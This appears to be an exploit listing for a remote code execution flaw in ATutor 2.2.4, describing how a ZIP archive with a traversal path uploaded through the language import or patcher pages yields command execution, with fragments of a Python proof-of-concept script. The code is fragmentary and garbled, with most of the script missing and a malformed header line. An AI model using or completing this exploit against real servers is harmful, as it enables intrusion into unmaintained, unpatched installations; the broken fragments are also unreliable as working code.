ATutor 2.2.4 Arbitrary File Upload Command Execution

# Exploit Title: ATutor 2.2.4 'language_import' Arbitrary File Upload / RCE
#!/usr/bin/env python
# Exploit Author: liquidsky (JM
# Tested on: Windows 8 / Apache / MySQL (XAMPP)
# Description: ATutor 2.2.4 allows Arbitrary File Upload and Directory Traversal
# resulting in remote code execution via a "." pathname in a ZIP archive to the mods/_core/languages/language_import.php (aka Import New Language) or mods/_standard/patcher/index_admin.php (aka Patcher) component.
# Notes: This application is no longer being maintained so there is no fix for this issue.
print "- ATutor 2.2.4 Arbitrary File Upload / RCE "
print "- Discovery / PoC by liquidsky (JMcPeters) ^^"
print "- Example: %s admin mypassword 'whoami'" % sys.argv
"Referer": " + target + "/ATutor/mods/_core/languages/language_import.php",
# Note: This was successfully tested against a windows install however it should work with linux.